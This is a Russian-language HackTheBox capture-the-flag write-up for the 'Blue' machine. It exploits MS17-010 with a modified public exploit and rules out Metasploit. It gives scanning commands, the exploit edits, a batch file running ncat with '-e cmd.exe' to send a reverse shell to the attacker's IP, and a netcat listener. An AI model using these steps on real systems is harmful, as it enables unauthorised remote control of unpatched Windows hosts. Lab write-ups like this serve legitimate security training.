###### tags: `HTB`
# HTB: Blue
Решить машину Blue на Hack the box используя модификацию эксплойта https://github.com/worawit/MS17-010.
Условия:
нужно получить реверс-шелл
нельзя загружать файлы, нужно сделать это одной командой при запуске сервиса
нельзя пользоваться хэндлерами msf и payload-ами msfvenom
Проведем разведку что мы имеем на машине?
`sudo masscan --open -p0-65535 10.10.10.40 --rate=5000 -oG scan_result -e tun0`
Либо так:
`sudo nmap -sV -p - -sT 10.10.10.40`

качаем под питон2.7 скрипт, чтобы работал пип
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjd15ax04T5AhVHEncKHeouCiIQFnoECAoQAQ&url=https%3A%2F%2Fbootstrap.pypa.io%2Fpip%2F2.7%2Fget-pip.py&usg=AOvVaw3NurauyKOUpxhaQCFW_43A
sudo python2.7 -m pip install distribute
sudo python2.7 -m pip install impacket
https://github.com/worawit/MS17-010
Качаем отсюда сборки уязвимостей, в файле checker.ip меняем `USERNAME="\\"` чтобы проверить есть ли доступ гостю (для удобства добавил /etc/hosts адрес машины как blue.htb)

Аналогичным образом модифицируем эксплойт zzz_exploit.py `(USERNAME="\\"`) и прописываем нужные нам файлы для получения доступа
Нам необходимо получить реверс-шелл при условиях что нельзя пользоваться ни msfvenom, ни msf.
Чтож, тогда используем портативную версию ncat
https://github.com/cyberisltd/NcatPortable
Задача - нам надо с помощью эксплойта запустить неткат, передать ему параметры для получения реверс-шелла.
Как это сделать? Мы параметры запуска портативного нетката пропишем в батфайлик, загрузим с помощью эксплойта и его, и запустим на удаленной машине.
Модифицируем эксплойт

Наш бат файлик выглядит так:
```
@echo off
"C:\ncat.exe" -nv 10.10.14.4 3333 -e cmd.exe
```
На Кали:
`nc -nlvp 3333`
python2.7 zzz_exploit.py blue.htb
Получили сессию, дальше шаримся по подкаталогам, и на рабочем столе у пользователя haris берем флаг
